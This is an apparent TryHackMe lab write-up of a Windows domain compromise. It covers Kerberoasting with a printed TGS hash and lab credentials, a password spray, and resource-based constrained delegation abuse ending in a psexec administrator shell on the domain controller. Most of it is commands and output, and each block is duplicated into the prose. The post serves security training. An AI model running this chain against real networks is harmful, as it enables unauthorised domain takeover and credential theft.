June 6, 2026
TryHackMe CTF Challenge: Jr Penetration Tester ‐ Forward (Write‐ups)
This post details the steps taken to compromise the target system and obtain the administration flag.
Fuad Khan
3 min read
Initial Access: Domain user access was provided
Upon login, a .kdbx file was discovered in the Documents folder:
We found the KeyPass 2 application installed, which could be logged into using only a standard Windows user account without requiring credentials. I made an FOOLISH attempt to crack the Database.kdbx file, where i wasted TIME and ENERGY.
Side Note: A kerberoastable account was identified. Attempts were made to crack the hash, resulting in further WASTED TIME and ENERGY.
impacket-GetUserSPNs ctf.local/j.smith:'JSmith@IT2024' -dc-ip 10.48.168.46 -request
Impacket v0.14.0.dev0 - Copyright Fortra, LLC and its affiliated companies
ServicePrincipalName Name MemberOf PasswordLastSet LastLogon Delegation
----------------------- ------------ -------- -------------------------- -------------------------- -----------
helpdesk/DC01 svc.helpdesk 2026-05-21 00:35:56.137405 2026-05-21 00:35:14.951529 constrained
helpdesk/DC01.ctf.local svc.helpdesk 2026-05-21 00:35:56.137405 2026-05-21 00:35:14.951529 constrained
[-] CCache file is not found. Skipping...
$krb5tgs$23$*svc.helpdesk$CTF.LOCAL$ctf.local/svc.helpdesk*$cec80a9cbfa1e9d666e9de45e40f24b6$1dd53d850c6f51f02182e715f1666dbcfd6b8e9692135796289b8a375177222c2ce36730d3072f2c18f298a9c5a61873caa846c76203b11dfbe74977e1259583393af21ac5cf21d203161b4be3d6f3ec643ba5a4bb9b7b20ef55d45c0328651c118ea37d6d894b5e10aa45bade1670330f21de7c3734ed99f1b3d5cb28522b062c1a42fc63611c18be42b31169517aa6489520880b47011b09b66b22bad67af47ae070d1f688b1d36e4c1ebd22f1e25568e55999a616c66028d7c814a98142ef81245657d63badc1096308b8c4052ae468ffc9a498b79a407eca58285737e8358b0eab55505089412dc8c56619c0cbec6f331836a487e9a116458419fa277c20a41445ce28d6da0fcf702267211732ccfdb54446e40c6128f860e1cf88771e6880e480301f74edc4e5ce9c37850cc1a7cbd277512867e63d8dc8731be66e4d45380ae9870a27f4eeb311f80a6165c96f3466ee7518952cfdc78c1105a4407206c0c67214bc2e102c5a396550476c8a99bd0e6d6652a5cec3da8f05b571e215d4b2cf5f65007394b2deabc7484712e7c7f9f401f5482bda2a78e06a272352f5258e519e451dcfd1336108e9d3d37c32b0fc587a4882555efc9d01e2405aaf58e575cd6eb9b472e24b3e90d4e1a2280fab77dc5475f386abadad07ad20a1260380327587e8a8d1504320210147b1bd64604fd1d4a08f2c372c3af66ffa23d81d08cc81c45f64c560c7769d29436715a7ef07e0f4517a0674113615b29819dd468ea041ebe5d9559e1a667d5ff2d86d87929a11ca2a45fe945499348d39570e527e5d29728861bb216b9745819471ff7acb28aaf424144989acc2373b70eeb3a4c976b79627f1a009ba17b5f5d1fe4c5f64fba35b6391fd13eec8892228e4ac799ebf78eb617f01ba4b5ed431a59fa4d1586feba577e0b4fcb20a7da68ed27fa0e96fe91532b79706247118d635dbf60297c0564ab295eaa696fc9e58530cb43be645a661e9bc8bfec964b240bd33b13bb37227cada93aa3e6b5026c0423ac48334b33acf5ef2d484e240d0d5af7184f57010c03be553aae8d23565fcb9707952e7b8341dda7ec6c3df051f5cee1c69d3f7ef41e25a669775505624c900baf609f8e09c7dc2431b18571b6cf884a1ad397f44b2ff2bbfd813dbe86afbeae92824256fff86bce8ffca9f623daa407a6179751f2a5c907af64b7d4ae96d56e784dd3255f3ef5cc2627526e478152e45101029fb0faeba7c624e9cdae0b461f9d2ad5d31a2233710f2d7c7e6eaae419bb848d88a2c925de153dee8dbc37f4db59233ec33ebe0674c2bae6df81c0f704328impacket-GetUserSPNs ctf.local/j.smith:'JSmith@IT2024' -dc-ip 10.48.168.46 -request
Impacket v0.14.0.dev0 - Copyright Fortra, LLC and its affiliated companies
ServicePrincipalName Name MemberOf PasswordLastSet LastLogon Delegation
----------------------- ------------ -------- -------------------------- -------------------------- -----------
helpdesk/DC01 svc.helpdesk 2026-05-21 00:35:56.137405 2026-05-21 00:35:14.951529 constrained
helpdesk/DC01.ctf.local svc.helpdesk 2026-05-21 00:35:56.137405 2026-05-21 00:35:14.951529 constrained
[-] CCache file is not found. Skipping...
$krb5tgs$23$*svc.helpdesk$CTF.LOCAL$ctf.local/svc.helpdesk*$cec80a9cbfa1e9d666e9de45e40f24b6$1dd53d850c6f51f02182e715f1666dbcfd6b8e9692135796289b8a375177222c2ce36730d3072f2c18f298a9c5a61873caa846c76203b11dfbe74977e1259583393af21ac5cf21d203161b4be3d6f3ec643ba5a4bb9b7b20ef55d45c0328651c118ea37d6d894b5e10aa45bade1670330f21de7c3734ed99f1b3d5cb28522b062c1a42fc63611c18be42b31169517aa6489520880b47011b09b66b22bad67af47ae070d1f688b1d36e4c1ebd22f1e25568e55999a616c66028d7c814a98142ef81245657d63badc1096308b8c4052ae468ffc9a498b79a407eca58285737e8358b0eab55505089412dc8c56619c0cbec6f331836a487e9a116458419fa277c20a41445ce28d6da0fcf702267211732ccfdb54446e40c6128f860e1cf88771e6880e480301f74edc4e5ce9c37850cc1a7cbd277512867e63d8dc8731be66e4d45380ae9870a27f4eeb311f80a6165c96f3466ee7518952cfdc78c1105a4407206c0c67214bc2e102c5a396550476c8a99bd0e6d6652a5cec3da8f05b571e215d4b2cf5f65007394b2deabc7484712e7c7f9f401f5482bda2a78e06a272352f5258e519e451dcfd1336108e9d3d37c32b0fc587a4882555efc9d01e2405aaf58e575cd6eb9b472e24b3e90d4e1a2280fab77dc5475f386abadad07ad20a1260380327587e8a8d1504320210147b1bd64604fd1d4a08f2c372c3af66ffa23d81d08cc81c45f64c560c7769d29436715a7ef07e0f4517a0674113615b29819dd468ea041ebe5d9559e1a667d5ff2d86d87929a11ca2a45fe945499348d39570e527e5d29728861bb216b9745819471ff7acb28aaf424144989acc2373b70eeb3a4c976b79627f1a009ba17b5f5d1fe4c5f64fba35b6391fd13eec8892228e4ac799ebf78eb617f01ba4b5ed431a59fa4d1586feba577e0b4fcb20a7da68ed27fa0e96fe91532b79706247118d635dbf60297c0564ab295eaa696fc9e58530cb43be645a661e9bc8bfec964b240bd33b13bb37227cada93aa3e6b5026c0423ac48334b33acf5ef2d484e240d0d5af7184f57010c03be553aae8d23565fcb9707952e7b8341dda7ec6c3df051f5cee1c69d3f7ef41e25a669775505624c900baf609f8e09c7dc2431b18571b6cf884a1ad397f44b2ff2bbfd813dbe86afbeae92824256fff86bce8ffca9f623daa407a6179751f2a5c907af64b7d4ae96d56e784dd3255f3ef5cc2627526e478152e45101029fb0faeba7c624e9cdae0b461f9d2ad5d31a2233710f2d7c7e6eaae419bb848d88a2c925de153dee8dbc37f4db59233ec33ebe0674c2bae6df81c0f704328Next, the AddAllowdToAct ACL was found during path discovery leading to administration rights in bloodhound pathfinder.
To exploit this, the required action was obtaining the access to the user r.williams. We attempted a password-spray attack using common passwords gathered to all the domain users. Luckily, we discovered that r.williams shared the same password as t.jones, which was extracted from the .kdbx file.
nxc smb 10.48.166.217 -u users -p pass2 --continue-on-success
SMB 10.48.166.217 445 DC01 [*] Windows 10 / Server 2019 Build 17763 x64 (name:DC01) (domain:ctf.local) (signing:True) (SMBv1:None) (Null Auth:True)
SMB 10.48.166.217 445 DC01 [-] ctf.local\j.smith:XXXXXXX STATUS_LOGON_FAILURE
SMB 10.48.166.217 445 DC01 [+] ctf.local\t.jones:XXXXXXX
SMB 10.48.166.217 445 DC01 [+] ctf.local\r.williams:XXXXXX
SMB 10.48.166.217 445 DC01 [+] ctf.local\j.smith:JSmith@IT2024 nxc smb 10.48.166.217 -u users -p pass2 --continue-on-success
SMB 10.48.166.217 445 DC01 [*] Windows 10 / Server 2019 Build 17763 x64 (name:DC01) (domain:ctf.local) (signing:True) (SMBv1:None) (Null Auth:True)
SMB 10.48.166.217 445 DC01 [-] ctf.local\j.smith:XXXXXXX STATUS_LOGON_FAILURE
SMB 10.48.166.217 445 DC01 [+] ctf.local\t.jones:XXXXXXX
SMB 10.48.166.217 445 DC01 [+] ctf.local\r.williams:XXXXXX
SMB 10.48.166.217 445 DC01 [+] ctf.local\j.smith:JSmith@IT2024Finally, applying the method derived from BloodHound revealed local administrator access and allowed us to find the flag.
impacket-addcomputer -computer-name 'ATTACKERSYSTEM$' -computer-pass 'Summer2018!' -dc-host DC01.ctf.local -domain-netbios ctf.local 'ctf.local/r.williams:XXXXXXXX' -dc-ip 10.48.166.217
[*] Successfully added machine account ATTACKERSYSTEM$ with password Summer2018!.
impacket-rbcd -delegate-from 'ATTACKERSYSTEM$' -delegate-to 'DC01$' -action 'write' 'ctf.local/r.williams:XXXXXXXX' -dc-ip 10.48.166.217
[*] Attribute msDS-AllowedToActOnBehalfOfOtherIdentity is empty
[*] Delegation rights modified successfully!
[*] ATTACKERSYSTEM$ can now impersonate users on DC01$ via S4U2Proxy
[*] Accounts allowed to act on behalf of other identity:
[*] ATTACKERSYSTEM$ (S-1-5-21-1966530601-3185510712-10604624-3109)
impacket-getST -spn 'cifs/DC01.ctf.local' -impersonate 'ADMINISTRATOR' 'ctf.local/attackersystem$:Summer2018!' -dc-ip 10.48.166.217
[*] Getting TGT for user
[*] Impersonating ADMINISTRATOR
[*] Requesting S4U2self
[*] Requesting S4U2Proxy
[*] Saving ticket in ADMINISTRATOR@cifs_DC01.ctf.local@CTF.LOCAL.ccache
export KRB5CCNAME=ADMINISTRATOR@cifs_DC01.ctf.local@CTF.LOCAL.ccache
impacket-psexec -k CTF.LOCAL/ADMINISTRATOR@DC01.ctf.local -dc-ip 10.48.166.217 -target-ip 10.48.166.217
[*] Requesting shares on 10.48.166.217.....
[*] Found writable share ADMIN$
[*] Uploading file sEmbTsYA.exe
[*] Opening SVCManager on 10.48.166.217.....
[*] Creating service Rxuo on 10.48.166.217.....
[*] Starting service Rxuo.....
[!] Press help for extra shell commands
Microsoft Windows [Version 10.0.17763.1821]
(c) 2018 Microsoft Corporation. All rights reserved.
C:\Windows\system32>
C:\Windows\system32>cd C:\Users\Administrator\Desktop
C:\Users\Administrator\Desktop> type flag.txt
THM{XXXXXXXXXXXXXXXXXXXXXXXXX}impacket-addcomputer -computer-name 'ATTACKERSYSTEM$' -computer-pass 'Summer2018!' -dc-host DC01.ctf.local -domain-netbios ctf.local 'ctf.local/r.williams:XXXXXXXX' -dc-ip 10.48.166.217
[*] Successfully added machine account ATTACKERSYSTEM$ with password Summer2018!.
impacket-rbcd -delegate-from 'ATTACKERSYSTEM$' -delegate-to 'DC01$' -action 'write' 'ctf.local/r.williams:XXXXXXXX' -dc-ip 10.48.166.217
[*] Attribute msDS-AllowedToActOnBehalfOfOtherIdentity is empty
[*] Delegation rights modified successfully!
[*] ATTACKERSYSTEM$ can now impersonate users on DC01$ via S4U2Proxy
[*] Accounts allowed to act on behalf of other identity:
[*] ATTACKERSYSTEM$ (S-1-5-21-1966530601-3185510712-10604624-3109)
impacket-getST -spn 'cifs/DC01.ctf.local' -impersonate 'ADMINISTRATOR' 'ctf.local/attackersystem$:Summer2018!' -dc-ip 10.48.166.217
[*] Getting TGT for user
[*] Impersonating ADMINISTRATOR
[*] Requesting S4U2self
[*] Requesting S4U2Proxy
[*] Saving ticket in ADMINISTRATOR@cifs_DC01.ctf.local@CTF.LOCAL.ccache
export KRB5CCNAME=ADMINISTRATOR@cifs_DC01.ctf.local@CTF.LOCAL.ccache
impacket-psexec -k CTF.LOCAL/ADMINISTRATOR@DC01.ctf.local -dc-ip 10.48.166.217 -target-ip 10.48.166.217
[*] Requesting shares on 10.48.166.217.....
[*] Found writable share ADMIN$
[*] Uploading file sEmbTsYA.exe
[*] Opening SVCManager on 10.48.166.217.....
[*] Creating service Rxuo on 10.48.166.217.....
[*] Starting service Rxuo.....
[!] Press help for extra shell commands
Microsoft Windows [Version 10.0.17763.1821]
(c) 2018 Microsoft Corporation. All rights reserved.
C:\Windows\system32>
C:\Windows\system32>cd C:\Users\Administrator\Desktop
C:\Users\Administrator\Desktop> type flag.txt
THM{XXXXXXXXXXXXXXXXXXXXXXXXX}